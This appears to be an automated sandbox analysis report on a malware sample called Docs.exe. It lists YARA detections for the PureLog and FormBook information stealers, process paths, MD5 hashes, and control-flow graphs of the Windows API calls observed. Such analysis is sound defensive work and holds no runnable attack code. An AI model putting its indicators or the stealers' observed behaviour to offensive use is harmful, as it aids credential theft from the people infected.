                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:12:28:30
                                                            Start date:28/11/2024
                                                            Path:C:\Users\user\Desktop\Docs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Docs.exe"
                                                            Imagebase:0xad0000
                                                            File size:799'232 bytes
                                                            MD5 hash:DB3260038649D2048D4D203B210C42AD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:12:29:16
                                                            Start date:28/11/2024
                                                            Path:C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe"
                                                            Imagebase:0x3c0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:12:29:18
                                                            Start date:28/11/2024
                                                            Path:C:\Windows\SysWOW64\tzutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                            Imagebase:0xbc0000
                                                            File size:48'640 bytes
                                                            MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:12:29:30
                                                            Start date:28/11/2024
                                                            Path:C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe"
                                                            Imagebase:0x3c0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:12:29:42
                                                            Start date:28/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:9.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:37
                                                              Total number of Limit Nodes:3
                                                              execution_graph 27555 e84668 27556 e8467a 27555->27556 27557 e84686 27556->27557 27559 e84779 27556->27559 27560 e8479d 27559->27560 27564 e84888 27560->27564 27568 e84878 27560->27568 27565 e848af 27564->27565 27566 e8498c 27565->27566 27572 e844b0 27565->27572 27566->27566 27570 e84888 27568->27570 27569 e8498c 27569->27569 27570->27569 27571 e844b0 CreateActCtxA 27570->27571 27571->27569 27573 e85918 CreateActCtxA 27572->27573 27575 e859db 27573->27575 27576 7236cc7 CloseHandle 27577 7236d2f 27576->27577 27578 e8d0c0 27579 e8d106 27578->27579 27583 e8d6a8 27579->27583 27586 e8d699 27579->27586 27580 e8d1f3 27589 e8d2fc 27583->27589 27587 e8d6d6 27586->27587 27588 e8d2fc DuplicateHandle 27586->27588 27587->27580 27588->27587 27590 e8d710 DuplicateHandle 27589->27590 27591 e8d6d6 27590->27591 27591->27580 27592 e8ad30 27595 e8ae28 27592->27595 27593 e8ad3f 27596 e8ae5c 27595->27596 27597 e8ae39 27595->27597 27596->27593 27597->27596 27598 e8b060 GetModuleHandleW 27597->27598 27599 e8b08d 27598->27599 27599->27593 27600 7233f98 27601 7233fe6 DrawTextExW 27600->27601 27603 723403e 27601->27603

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 295 723aa60-723aa81 296 723aa83 295->296 297 723aa88-723ab74 295->297 296->297 299 723b3a3-723b3cb 297->299 300 723ab7a-723acce 297->300 303 723baac-723bab5 299->303 344 723b371-723b3a0 300->344 345 723acd4-723ad2f 300->345 304 723babb-723bad2 303->304 305 723b3d9-723b3e2 303->305 307 723b3e4 305->307 308 723b3e9-723b4dd 305->308 307->308 326 723b507 308->326 327 723b4df-723b4eb 308->327 331 723b50d-723b52d 326->331 329 723b4f5-723b4fb 327->329 330 723b4ed-723b4f3 327->330 332 723b505 329->332 330->332 335 723b52f-723b55d 331->335 336 723b58d-723b605 331->336 332->331 342 723b569-723b588 335->342 355 723b607-723b65a 336->355 356 723b65c-723b69f 336->356 349 723baa9 342->349 344->299 352 723ad31 345->352 353 723ad34-723ad3f 345->353 349->303 352->353 357 723b283-723b289 353->357 385 723b6aa-723b6b0 355->385 356->385 358 723ad44-723ad62 357->358 359 723b28f-723b30c 357->359 362 723ad64-723ad68 358->362 363 723adb9-723adce 358->363 399 723b35b-723b361 359->399 362->363 368 723ad6a-723ad75 362->368 365 723add0 363->365 366 723add5-723adeb 363->366 365->366 370 723adf2-723ae09 366->370 371 723aded 366->371 372 723adab-723adb1 368->372 376 723ae10-723ae26 370->376 377 723ae0b 370->377 371->370 374 723adb3-723adb4 372->374 375 723ad77-723ad7b 372->375 379 723ae37-723aea8 374->379 381 723ad81-723ad99 375->381 382 723ad7d 375->382 383 723ae28 376->383 384 723ae2d-723ae34 376->384 377->376 386 723aeaa 379->386 387 723aebe-723b036 379->387 389 723ada0-723ada8 381->389 390 723ad9b 381->390 382->381 383->384 384->379 391 723b707-723b713 385->391 386->387 392 723aeac-723aeb8 386->392 400 723b038 387->400 401 723b04c-723b187 387->401 389->372 390->389 393 723b6b2-723b6d4 391->393 394 723b715-723b79b 391->394 392->387 395 723b6d6 393->395 396 723b6db-723b704 393->396 421 723b920-723b929 394->421 395->396 396->391 404 723b363-723b369 399->404 405 723b30e-723b358 399->405 400->401 406 723b03a-723b046 400->406 414 723b1eb-723b200 401->414 415 723b189-723b18d 401->415 404->344 405->399 406->401 417 723b202 414->417 418 723b207-723b228 414->418 415->414 419 723b18f-723b19e 415->419 417->418 423 723b22a 418->423 424 723b22f-723b24e 418->424 420 723b1dd-723b1e3 419->420 425 723b1a0-723b1a4 420->425 426 723b1e5-723b1e6 420->426 427 723b7a0-723b7b5 421->427 428 723b92f-723b988 421->428 423->424 429 723b250 424->429 430 723b255-723b275 424->430 431 723b1a6-723b1aa 425->431 432 723b1ae-723b1cf 425->432 437 723b280 426->437 433 723b7b7 427->433 434 723b7be-723b914 427->434 452 723b98a-723b9bd 428->452 453 723b9bf-723b9e9 428->453 429->430 435 723b277 430->435 436 723b27c 430->436 431->432 439 723b1d1 432->439 440 723b1d6-723b1da 432->440 433->434 441 723b893-723b8d3 433->441 442 723b7c4-723b804 433->442 443 723b809-723b849 433->443 444 723b84e-723b88e 433->444 457 723b91a 434->457 435->436 436->437 437->357 439->440 440->420 441->457 442->457 443->457 444->457 461 723b9f2-723ba9d 452->461 453->461 457->421 461->349
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'pq$TJuq$Tepq$ptq$xbsq
                                                              • API String ID: 0-4058655881
                                                              • Opcode ID: f2eef064f2385205aad544551fae37916e22b4e1ef4dc13945a1f613192a3791
                                                              • Instruction ID: 51e733ea30d46dabe88ee358221e4b1a50f2360fbb4fba3b17054fe28c6f2622
                                                              • Opcode Fuzzy Hash: f2eef064f2385205aad544551fae37916e22b4e1ef4dc13945a1f613192a3791
                                                              • Instruction Fuzzy Hash: 83B2B4B5E10628CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 617 723a7b8-723a7c5 618 723a7a1-723a7a7 617->618 619 723a7c7-723a7e7 617->619 652 723a7a9 call 723aa60 618->652 653 723a7a9 call 723b3d0 618->653 654 723a7a9 call 723aa4f 618->654 620 723a7e9 619->620 621 723a7ee-723aa4d 619->621 620->621 622 723a7af-723a7b3 652->622 653->622 654->622
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'pq
                                                              • API String ID: 0-1798494419
                                                              • Opcode ID: cfc97f6661872e764dd04b4e561c869e9fbd91d48c4526fd0680eedd5b1fef87
                                                              • Instruction ID: dea34c7edaab74bed7236f68bf19dc4d5d98e702cd6d697f756a2ae2c42e1ad6
                                                              • Opcode Fuzzy Hash: cfc97f6661872e764dd04b4e561c869e9fbd91d48c4526fd0680eedd5b1fef87
                                                              • Instruction Fuzzy Hash: F9715DB1E2120A9FE745DF7AE98569A7BF3EF88300F14D429E404A7368EA751946CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa5db7a91cdbe303189792ab59e1a8b9c1ad8849d54779572e7e06e264dfdf9a
                                                              • Instruction ID: b3c99ac45285d8a8d58f730977d66d1ed484a2a67de93fd6a46e464a28fcc122
                                                              • Opcode Fuzzy Hash: fa5db7a91cdbe303189792ab59e1a8b9c1ad8849d54779572e7e06e264dfdf9a
                                                              • Instruction Fuzzy Hash: 5CA1E2F5E24229CFDB14CFA6C8447EDBBB6BF8A301F10906AD409A7251DB745A86CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12d46c957160a44659ec635cc2c9f2cf9ff616d843d5a59b1222b386aa942788
                                                              • Instruction ID: cadfaa2e0aab021a693cb307971f0d6ea70798dc4551369083bc41b747db31cb
                                                              • Opcode Fuzzy Hash: 12d46c957160a44659ec635cc2c9f2cf9ff616d843d5a59b1222b386aa942788
                                                              • Instruction Fuzzy Hash: C9A1F4F5E25229CFDB14CFA5C8447EDBBB2BF8A301F10906AD409AB251DB745A86CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1697e12bbd7a3de113d616c8d83affbda39b4c81af3be39994a6cff31adf9f3
                                                              • Instruction ID: 1444ec45e8d43c1512c68d1fb059d25870d2c9baa087645241f9ead250a0fbf4
                                                              • Opcode Fuzzy Hash: c1697e12bbd7a3de113d616c8d83affbda39b4c81af3be39994a6cff31adf9f3
                                                              • Instruction Fuzzy Hash: CE8100F4E29218CFCB14DFA9C484AEDBBF5BB4A300F10A55AD409AB316D7B09985CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b830e138542d4b971f21958c99ec4d231a853e854bc998f2d42dbc93a42d6be
                                                              • Instruction ID: 91121f1f635ffe8c306ce279552bacc94c7db30fba77a6a8fad244d113936556
                                                              • Opcode Fuzzy Hash: 8b830e138542d4b971f21958c99ec4d231a853e854bc998f2d42dbc93a42d6be
                                                              • Instruction Fuzzy Hash: D231C3B1E156188BDB18CFABC94469EFFF3AFC8300F18C16AD818AB265EB7055458F50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bb131691f4d36ae36285f067bb3cccaa4b2b9c63fb1035c295b674a8e27ad75
                                                              • Instruction ID: 188f4f71a7dd730256276f60bc2ee6de5f44ba3737a63b0193d2baf7820760f2
                                                              • Opcode Fuzzy Hash: 2bb131691f4d36ae36285f067bb3cccaa4b2b9c63fb1035c295b674a8e27ad75
                                                              • Instruction Fuzzy Hash: 5C3191B1E146188BEB18CFABD94469EFEF7AFC8300F14C16AD418A7265EB7055418F50

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 488 e8ae28-e8ae37 489 e8ae39-e8ae46 call e8a14c 488->489 490 e8ae63-e8ae67 488->490 495 e8ae48 489->495 496 e8ae5c 489->496 492 e8ae69-e8ae73 490->492 493 e8ae7b-e8aebc 490->493 492->493 499 e8aec9-e8aed7 493->499 500 e8aebe-e8aec6 493->500 546 e8ae4e call e8b0c0 495->546 547 e8ae4e call e8b0b0 495->547 496->490 501 e8aed9-e8aede 499->501 502 e8aefb-e8aefd 499->502 500->499 504 e8aee9 501->504 505 e8aee0-e8aee7 call e8a158 501->505 507 e8af00-e8af07 502->507 503 e8ae54-e8ae56 503->496 506 e8af98-e8afaf 503->506 509 e8aeeb-e8aef9 504->509 505->509 519 e8afb1-e8b010 506->519 510 e8af09-e8af11 507->510 511 e8af14-e8af1b 507->511 509->507 510->511 513 e8af28-e8af31 call e8a168 511->513 514 e8af1d-e8af25 511->514 520 e8af3e-e8af43 513->520 521 e8af33-e8af3b 513->521 514->513 539 e8b012-e8b058 519->539 522 e8af61-e8af6e 520->522 523 e8af45-e8af4c 520->523 521->520 530 e8af70-e8af8e 522->530 531 e8af91-e8af97 522->531 523->522 524 e8af4e-e8af5e call e8a178 call e8a188 523->524 524->522 530->531 541 e8b05a-e8b05d 539->541 542 e8b060-e8b08b GetModuleHandleW 539->542 541->542 543 e8b08d-e8b093 542->543 544 e8b094-e8b0a8 542->544 543->544 546->503 547->503
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8B07E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: c765892ef1e6bcc02bb3283f5f75d14b17f6a3706ab7338e0029a2d6d0162cce
                                                              • Instruction ID: d79a47a1b49ce44b65a5f0c555cb1d689734f49fbb572794dbf31619da8c6e33
                                                              • Opcode Fuzzy Hash: c765892ef1e6bcc02bb3283f5f75d14b17f6a3706ab7338e0029a2d6d0162cce
                                                              • Instruction Fuzzy Hash: 807146B0A00B058FE724EF29D44575ABBF1FF88304F14892EE48AE7A50DB74E845CB91

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 548 e8590c-e85914 549 e85918-e859d9 CreateActCtxA 548->549 551 e859db-e859e1 549->551 552 e859e2-e85a3c 549->552 551->552 559 e85a4b-e85a4f 552->559 560 e85a3e-e85a41 552->560 561 e85a60 559->561 562 e85a51-e85a5d 559->562 560->559 564 e85a61 561->564 562->561 564->564
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00E859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 3cefb3417dc07b5502809cde56b2ae6fc0848a91beda81ceccb93fb575ed4ee8
                                                              • Instruction ID: 20fa70909c909b4b98af78054968222de3eaa88083a3bf953c7452b774cc4a10
                                                              • Opcode Fuzzy Hash: 3cefb3417dc07b5502809cde56b2ae6fc0848a91beda81ceccb93fb575ed4ee8
                                                              • Instruction Fuzzy Hash: 4141EFB1C00A1DCFDB24DFA9C884ACEBBB5BF88304F20815AD408AB255DB756945CF91

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 565 e844b0-e859d9 CreateActCtxA 568 e859db-e859e1 565->568 569 e859e2-e85a3c 565->569 568->569 576 e85a4b-e85a4f 569->576 577 e85a3e-e85a41 569->577 578 e85a60 576->578 579 e85a51-e85a5d 576->579 577->576 581 e85a61 578->581 579->578 581->581
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00E859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: d927b58300a1f637174f3e8860529ded9ff956575c7858a1bf78fbee2f0d7ef4
                                                              • Instruction ID: 1b36799cf3499a010452b91eaa3e969aff8e4a484613ef3219f1ebccf3be5936
                                                              • Opcode Fuzzy Hash: d927b58300a1f637174f3e8860529ded9ff956575c7858a1bf78fbee2f0d7ef4
                                                              • Instruction Fuzzy Hash: 3E41DFB1C00B1DCBDB24DFA9C884BDEBBB5BF88304F20816AD409AB255DB756945CF91

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 582 7233f90-7233fe4 583 7233fe6-7233fec 582->583 584 7233fef-7233ffe 582->584 583->584 585 7234003-723403c DrawTextExW 584->585 586 7234000 584->586 587 7234045-7234062 585->587 588 723403e-7234044 585->588 586->585 588->587
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0723402F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 734a7d6bb3b90ca8650b27bc9d6f4b20694c2d55e413743faf6c8917e4daf1f6
                                                              • Instruction ID: b9f6428f77ac60db95561d8c756f198bcc009fc3066fe4fbf231c4af8fd024ee
                                                              • Opcode Fuzzy Hash: 734a7d6bb3b90ca8650b27bc9d6f4b20694c2d55e413743faf6c8917e4daf1f6
                                                              • Instruction Fuzzy Hash: C431E2B5D1034A9FDB10CF99D884ADEBBF4FB48310F14842AE819A7310D774A945CFA0

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 591 7233f98-7233fe4 592 7233fe6-7233fec 591->592 593 7233fef-7233ffe 591->593 592->593 594 7234003-723403c DrawTextExW 593->594 595 7234000 593->595 596 7234045-7234062 594->596 597 723403e-7234044 594->597 595->594 597->596
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0723402F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: ef3b81d038332914f7e04d95e737b1aa9e7c0b6d6996cc7b5202021cb6a0b695
                                                              • Instruction ID: 8f8dbe87eda5d2a56a72af4635dac1f9205201620fdc74873cba838216691864
                                                              • Opcode Fuzzy Hash: ef3b81d038332914f7e04d95e737b1aa9e7c0b6d6996cc7b5202021cb6a0b695
                                                              • Instruction Fuzzy Hash: CE21E0B5D1034A9FCB10CF9AD884AAEFBF4FB48310F14842AE819A7310D775A944CFA1

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 600 e8d2fc-e8d7a4 DuplicateHandle 602 e8d7ad-e8d7ca 600->602 603 e8d7a6-e8d7ac 600->603 603->602
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8D6D6,?,?,?,?,?), ref: 00E8D797
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: d62366067176c245cb47e968059fe8768ca3413460a5b935fc2f232dd65b8a2b
                                                              • Instruction ID: d74f0ac817a29522bce02b75081fac6033470fe08c9743f0f932ebec70dafe17
                                                              • Opcode Fuzzy Hash: d62366067176c245cb47e968059fe8768ca3413460a5b935fc2f232dd65b8a2b
                                                              • Instruction Fuzzy Hash: 4121E3B5D00249AFDB10DF9AD984ADEBBF8FB48310F14841AE918B3350D379A954CFA5

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 606 e8d709-e8d7a4 DuplicateHandle 607 e8d7ad-e8d7ca 606->607 608 e8d7a6-e8d7ac 606->608 608->607
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8D6D6,?,?,?,?,?), ref: 00E8D797
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ac1ba65ca16159a3ecdaebf56ea2d6109fd987968d3ca479f6b7c712fb230af0
                                                              • Instruction ID: 2929e5fa63acddd7885bbce83cfde36a6ea58d788343d954013be0b5e57f670d
                                                              • Opcode Fuzzy Hash: ac1ba65ca16159a3ecdaebf56ea2d6109fd987968d3ca479f6b7c712fb230af0
                                                              • Instruction Fuzzy Hash: 3321E2B5D002499FDB10CFA9D985AEEBBF4FB48310F14842AE918B3350D378A954CF65

                                                               Control-flow Graph (edge list; the executed/not-executed block colouring of the rendered graph is not preserved in text)
                                                              control_flow_graph 611 e8b018-e8b058 612 e8b05a-e8b05d 611->612 613 e8b060-e8b08b GetModuleHandleW 611->613 612->613 614 e8b08d-e8b093 613->614 615 e8b094-e8b0a8 613->615 614->615
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8B07E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 02ea97ee2574705a330789c0f8e41077b7fb2b76f011d5594d4681426573e16a
                                                              • Instruction ID: 0b60799b3c3f2a4331566210c0dadb1fa4243b5ef81b8cd78b3e7ec01f82e719
                                                              • Opcode Fuzzy Hash: 02ea97ee2574705a330789c0f8e41077b7fb2b76f011d5594d4681426573e16a
                                                              • Instruction Fuzzy Hash: 1611DFB5C003498FCB20DF9AD844A9EFBF8EB88314F14841AD869B7210D379A545CFA1
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07236B79,?,?), ref: 07236D20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a2dc0e0959e4b69279c1a43e8178bb83a3a2d5095ba861b414c6ee0da46e47a2
                                                              • Instruction ID: 5bc9cbcdbc2fa2d482115864fc86913bebd950e7c8fe0c7527aa22528aadef72
                                                              • Opcode Fuzzy Hash: a2dc0e0959e4b69279c1a43e8178bb83a3a2d5095ba861b414c6ee0da46e47a2
                                                              • Instruction Fuzzy Hash: 0C1155B5C103499FCB20DF99C548BDEBBF8EB48320F108419E959A7340C338A944CFA5
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07236B79,?,?), ref: 07236D20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: e2262113a335bc5bcd0368f811149e6556087e6b75eebdd7d6e974b2ee744003
                                                              • Instruction ID: a20f51fc51dc13ee28cbe6f1fa1bc73fb6f28e429c1eb5e91ba44cbb3f21044e
                                                              • Opcode Fuzzy Hash: e2262113a335bc5bcd0368f811149e6556087e6b75eebdd7d6e974b2ee744003
                                                              • Instruction Fuzzy Hash: FA1103B5C102499FCB20DF99D549BDEBBF4EF48320F24841AD568A7740D338A544CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00135608aeddd0e644ba03fb126dbf18e1d99d34911a14afdf7070f649e1e1d1
                                                              • Instruction ID: ad3dbeff5c2179993279a9cc72adb15f5200c16746e89682274be1ff9fb80708
